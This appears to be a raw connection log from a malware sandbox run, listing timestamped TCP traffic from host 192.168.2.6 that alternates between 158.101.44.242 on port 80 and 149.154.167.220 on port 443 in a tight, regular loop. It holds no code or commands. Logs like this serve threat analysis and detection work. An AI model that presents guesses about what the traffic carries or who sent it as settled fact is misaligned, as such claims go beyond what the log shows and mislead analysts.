Jan 10, 2025 22:44:03.574836969 CET	50018	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:03.579555035 CET	80	50018	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:04.147130966 CET	80	50018	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:04.148694038 CET	50019	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:04.148766994 CET	443	50019	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:04.148864031 CET	50019	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:04.149203062 CET	50019	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:04.149214029 CET	443	50019	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:04.199523926 CET	50018	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:04.756484032 CET	443	50019	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:04.758328915 CET	50019	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:04.758358955 CET	443	50019	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:04.758433104 CET	50019	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:04.758445024 CET	443	50019	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:05.137852907 CET	443	50019	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:05.137964010 CET	443	50019	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:05.138029099 CET	50019	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:05.138413906 CET	50019	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:05.141063929 CET	50018	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:05.142389059 CET	50020	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:05.146102905 CET	80	50018	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:05.146179914 CET	50018	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:05.147205114 CET	80	50020	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:05.147265911 CET	50020	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:05.147349119 CET	50020	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:05.152139902 CET	80	50020	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:05.755862951 CET	80	50020	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:05.757380962 CET	50021	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:05.757426977 CET	443	50021	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:05.757530928 CET	50021	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:05.757843018 CET	50021	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:05.757858038 CET	443	50021	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:05.808898926 CET	50020	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:06.364720106 CET	443	50021	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:06.366548061 CET	50021	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:06.366566896 CET	443	50021	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:06.366679907 CET	50021	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:06.366691113 CET	443	50021	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:06.769321918 CET	443	50021	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:06.769411087 CET	443	50021	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:06.769551039 CET	50021	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:06.770102978 CET	50021	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:06.772842884 CET	50020	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:06.774007082 CET	50023	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:06.777848005 CET	80	50020	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:06.777918100 CET	50020	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:06.778811932 CET	80	50023	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:06.778987885 CET	50023	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:06.778987885 CET	50023	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:06.783775091 CET	80	50023	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:07.352101088 CET	80	50023	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:07.353600025 CET	50025	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:07.353645086 CET	443	50025	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:07.353842020 CET	50025	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:07.354020119 CET	50025	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:07.354033947 CET	443	50025	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:07.402810097 CET	50023	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:08.056778908 CET	443	50025	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:08.065979004 CET	50025	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:08.066030979 CET	443	50025	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:08.066104889 CET	50025	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:08.066126108 CET	443	50025	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:08.473613024 CET	443	50025	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:08.473862886 CET	443	50025	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:08.473953009 CET	50025	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:08.474287987 CET	50025	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:08.477703094 CET	50023	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:08.478642941 CET	50026	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:08.483537912 CET	80	50026	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:08.483619928 CET	50026	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:08.483690023 CET	50026	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:08.488486052 CET	80	50026	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:08.500950098 CET	80	50023	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:08.501004934 CET	50023	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:09.059585094 CET	80	50026	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:09.060976982 CET	50027	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:09.061037064 CET	443	50027	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:09.061125994 CET	50027	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:09.061424971 CET	50027	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:09.061441898 CET	443	50027	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:09.105740070 CET	50026	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:09.670892000 CET	443	50027	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:09.672502995 CET	50027	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:09.672547102 CET	443	50027	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:09.672630072 CET	50027	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:09.672656059 CET	443	50027	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:10.067661047 CET	443	50027	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:10.068074942 CET	443	50027	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:10.068181992 CET	50027	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:10.071537971 CET	50027	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:10.075901031 CET	50026	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:10.076836109 CET	50028	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:10.080926895 CET	80	50026	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:10.081123114 CET	50026	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:10.081687927 CET	80	50028	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:10.081767082 CET	50028	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:10.081916094 CET	50028	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:10.086673021 CET	80	50028	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:10.669655085 CET	80	50028	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:10.671200037 CET	50029	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:10.671236038 CET	443	50029	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:10.671339989 CET	50029	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:10.671621084 CET	50029	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:10.671631098 CET	443	50029	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:10.715127945 CET	50028	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:11.300570965 CET	443	50029	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:11.303095102 CET	50029	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:11.303112030 CET	443	50029	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:11.303203106 CET	50029	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:11.303208113 CET	443	50029	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:11.615736008 CET	443	50029	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:11.615819931 CET	443	50029	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:11.616031885 CET	50029	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:11.616439104 CET	50029	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:11.619494915 CET	50028	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:11.620831966 CET	50030	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:11.624494076 CET	80	50028	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:11.624596119 CET	50028	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:11.625655890 CET	80	50030	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:11.625744104 CET	50030	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:11.625937939 CET	50030	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:11.630706072 CET	80	50030	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:12.193787098 CET	80	50030	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:12.195044994 CET	50031	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:12.195082903 CET	443	50031	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:12.195148945 CET	50031	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:12.195415974 CET	50031	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:12.195424080 CET	443	50031	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:12.246351957 CET	50030	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:12.811629057 CET	443	50031	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:12.813417912 CET	50031	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:12.813433886 CET	443	50031	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:12.813509941 CET	50031	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:12.813517094 CET	443	50031	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:13.222625017 CET	443	50031	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:13.222712040 CET	443	50031	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:13.222930908 CET	50031	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:13.223213911 CET	50031	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:13.226155043 CET	50030	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:13.227463007 CET	50032	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:13.231184959 CET	80	50030	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:13.231287003 CET	50030	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:13.232315063 CET	80	50032	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:13.232394934 CET	50032	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:13.232475042 CET	50032	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:13.237245083 CET	80	50032	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:13.892982006 CET	80	50032	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:13.894227028 CET	50033	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:13.894274950 CET	443	50033	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:13.894346952 CET	50033	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:13.894674063 CET	50033	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:13.894690037 CET	443	50033	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:13.933856010 CET	50032	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:14.524014950 CET	443	50033	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:14.525917053 CET	50033	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:14.525945902 CET	443	50033	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:14.526010036 CET	50033	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:14.526020050 CET	443	50033	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:14.906716108 CET	443	50033	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:14.906842947 CET	443	50033	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:14.906974077 CET	50033	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:14.907618999 CET	50033	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:14.910820961 CET	50032	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:14.912098885 CET	50034	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:14.916717052 CET	80	50032	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:14.916812897 CET	50032	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:14.916862965 CET	80	50034	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:14.916929960 CET	50034	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:14.917020082 CET	50034	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:14.921720982 CET	80	50034	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:15.508838892 CET	80	50034	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:15.510284901 CET	50035	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:15.510335922 CET	443	50035	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:15.510440111 CET	50035	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:15.510746002 CET	50035	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:15.510761976 CET	443	50035	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:15.558885098 CET	50034	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:16.117965937 CET	443	50035	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:16.119880915 CET	50035	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:16.119905949 CET	443	50035	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:16.119986057 CET	50035	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:16.119993925 CET	443	50035	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:16.461330891 CET	443	50035	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:16.461436987 CET	443	50035	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:16.461527109 CET	50035	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:16.462260008 CET	50035	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:16.465029955 CET	50034	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:16.466434956 CET	50036	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:16.470017910 CET	80	50034	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:16.470082998 CET	50034	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:16.471240997 CET	80	50036	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:16.471350908 CET	50036	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:16.471555948 CET	50036	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:16.476372004 CET	80	50036	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:17.063958883 CET	80	50036	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:17.065531969 CET	50037	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:17.065640926 CET	443	50037	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:17.066159964 CET	50037	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:17.066159964 CET	50037	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:17.066200972 CET	443	50037	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:17.105746984 CET	50036	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:17.682928085 CET	443	50037	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:17.685074091 CET	50037	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:17.685115099 CET	443	50037	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:17.685177088 CET	50037	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:17.685184956 CET	443	50037	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:18.073683023 CET	443	50037	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:18.073765993 CET	443	50037	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:18.073894024 CET	50037	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:18.074529886 CET	50037	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:18.077805042 CET	50036	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:18.079112053 CET	50038	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:18.082861900 CET	80	50036	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:18.082977057 CET	50036	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:18.083900928 CET	80	50038	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:18.083976030 CET	50038	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:18.084096909 CET	50038	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:18.088859081 CET	80	50038	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:18.677125931 CET	80	50038	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:18.678642035 CET	50039	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:18.678692102 CET	443	50039	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:18.678769112 CET	50039	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:18.679060936 CET	50039	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:18.679075003 CET	443	50039	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:18.730763912 CET	50038	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:19.287256956 CET	443	50039	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:19.289274931 CET	50039	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:19.289309978 CET	443	50039	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:19.289391041 CET	50039	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:19.289400101 CET	443	50039	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:19.745747089 CET	443	50039	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:19.745949030 CET	443	50039	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:19.746134043 CET	50039	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:19.746426105 CET	50039	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:19.749308109 CET	50038	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:19.750312090 CET	50040	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:19.754276991 CET	80	50038	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:19.754364014 CET	50038	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:19.755196095 CET	80	50040	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:19.755274057 CET	50040	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:19.755383015 CET	50040	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:19.760237932 CET	80	50040	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:20.343786955 CET	80	50040	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:20.345249891 CET	50041	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:20.345309973 CET	443	50041	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:20.345407963 CET	50041	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:20.345680952 CET	50041	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:20.345698118 CET	443	50041	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:20.386998892 CET	50040	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:20.976682901 CET	443	50041	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:20.978394032 CET	50041	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:20.978430033 CET	443	50041	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:20.978560925 CET	50041	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:20.978575945 CET	443	50041	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:21.411607027 CET	443	50041	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:21.411806107 CET	443	50041	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:21.411891937 CET	50041	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:21.413625002 CET	50041	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:21.417148113 CET	50040	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:21.418154955 CET	50042	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:21.422388077 CET	80	50040	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:21.422465086 CET	50040	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:21.423013926 CET	80	50042	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:21.423083067 CET	50042	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:21.423227072 CET	50042	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:21.428050041 CET	80	50042	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:21.987494946 CET	80	50042	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:21.989054918 CET	50043	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:21.989104033 CET	443	50043	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:21.989202976 CET	50043	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:21.989517927 CET	50043	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:21.989526987 CET	443	50043	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:22.043360949 CET	50042	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:22.606704950 CET	443	50043	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:22.608724117 CET	50043	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:22.608746052 CET	443	50043	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:22.609184980 CET	50043	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:22.609190941 CET	443	50043	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:23.038183928 CET	443	50043	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:23.038389921 CET	443	50043	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:23.038463116 CET	50043	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:23.038755894 CET	50043	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:23.041644096 CET	50042	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:23.042928934 CET	50044	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:23.046694040 CET	80	50042	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:23.046787977 CET	50042	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:23.047744036 CET	80	50044	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:23.047851086 CET	50044	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:23.047899961 CET	50044	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:23.052696943 CET	80	50044	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:23.654551983 CET	80	50044	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:23.655872107 CET	50045	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:23.655931950 CET	443	50045	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:23.656023979 CET	50045	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:23.656286001 CET	50045	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:23.656307936 CET	443	50045	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:23.699501991 CET	50044	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:24.285487890 CET	443	50045	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:24.287164927 CET	50045	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:24.287192106 CET	443	50045	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:24.287267923 CET	50045	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:24.287272930 CET	443	50045	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:24.633686066 CET	443	50045	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:24.633908987 CET	443	50045	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:24.634006023 CET	50045	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:24.634402037 CET	50045	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:24.637676001 CET	50044	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:24.638952971 CET	50046	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:24.642659903 CET	80	50044	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:24.642756939 CET	50044	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:24.643716097 CET	80	50046	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:24.643791914 CET	50046	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:24.643943071 CET	50046	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:24.648682117 CET	80	50046	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:25.226088047 CET	80	50046	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:25.227678061 CET	50047	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:25.227735043 CET	443	50047	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:25.227857113 CET	50047	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:25.228158951 CET	50047	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:25.228173018 CET	443	50047	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:25.277592897 CET	50046	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:25.832401037 CET	443	50047	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:25.834276915 CET	50047	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:25.834317923 CET	443	50047	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:25.834403038 CET	50047	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:25.834408998 CET	443	50047	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:26.106297016 CET	443	50047	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:26.106381893 CET	443	50047	149.154.167.220	192.168.2.6
Jan 10, 2025 22:44:26.106442928 CET	50047	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:26.106926918 CET	50047	443	192.168.2.6	149.154.167.220
Jan 10, 2025 22:44:26.109621048 CET	50046	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:26.110780954 CET	50048	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:26.114608049 CET	80	50046	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:26.114692926 CET	50046	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:26.115611076 CET	80	50048	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:26.115672112 CET	50048	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:26.115766048 CET	50048	80	192.168.2.6	158.101.44.242
Jan 10, 2025 22:44:26.120547056 CET	80	50048	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:26.678391933 CET	80	50048	158.101.44.242	192.168.2.6
Jan 10, 2025 22:44:26.685692072 CET	50049	443	192.168.2.6	149.154.167.220
